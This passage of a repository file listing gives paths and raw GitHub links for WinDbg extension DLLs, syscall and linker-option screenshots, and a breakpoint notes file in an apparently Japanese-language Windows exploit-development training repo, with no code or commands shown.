https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/symsrv.dll 
-------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/uext.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/uext.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/usb3kd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/usb3kd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/usbkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/usbkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/wdfkd.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/wdfkd.dll -------------------------------------------------------------------------------- /11_tools/windbg_pykd/winext/本ファイルの配置場所.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/winext/本ファイルの配置場所.png -------------------------------------------------------------------------------- /11_tools/windbg_pykd/ブレークポイント例.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/11_tools/windbg_pykd/ブレークポイント例.txt -------------------------------------------------------------------------------- /12_syscall/printf_syscall_x64/01_NtWriteFile_x64_sysenter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/12_syscall/printf_syscall_x64/01_NtWriteFile_x64_sysenter.png -------------------------------------------------------------------------------- /12_syscall/printf_syscall_x64/02_NtWriteFile_x64_sysenter.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/12_syscall/printf_syscall_x64/02_NtWriteFile_x64_sysenter.png -------------------------------------------------------------------------------- /13_MinGw_リンカオプション/mingw_gcc_コンパイル_リンク.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/13_MinGw_リンカオプション/mingw_gcc_コンパイル_リンク.png -------------------------------------------------------------------------------- /14_VC_リンカオプション/TinyWebコンパイルオプション.JPG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/14_VC_リンカオプション/TinyWebコンパイルオプション.JPG -------------------------------------------------------------------------------- /14_VC_リンカオプション/TinyWebリンカオプション.JPG: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/gungage53/windows-exploit-development/11a0e4921f2eac256002781d0a88629cbf6bf3b1/14_VC_リンカオプション/TinyWebリンカオプション.JPG --------------------------------------------------------------------------------